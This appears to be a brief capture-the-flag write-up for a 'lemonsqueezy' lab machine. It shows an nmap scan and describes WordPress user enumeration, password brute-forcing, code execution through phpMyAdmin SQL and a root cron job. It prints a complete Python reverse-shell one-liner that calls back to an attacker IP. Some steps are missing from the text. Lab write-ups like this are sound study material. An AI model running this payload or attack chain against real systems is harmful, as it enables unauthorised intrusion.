nmap -sC -sV 172.16.6.128
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-25 05:47 PKT
Nmap scan report for 172.16.6.128
Host is up (0.00026s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 00:0C:29:BF:8A:DB (VMware)Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.85 seconds
We see that there’s a wordpress directory and if you visit it css would not be rendered properly because it is using the domain name
lemonsqueezy so put it in the
Since this is a wordpress site we can use wpscan to look for users
Bruteforcing against these users
We know that there’s another usernamed
lemon maybe this is his passowrd for wordpress or phpmyadmin so let's try logging in with this
This was the password for orange to phpmyadmin
Insert a simple GET paramter php code to execute system commands through SQL
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.43.129",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Through this payload we get a reverse shell and I stabilized it with by spawning a shell with python also I looked at cronjobs running and there is a script running as root
This didnt work so I used the python reverse shell payload again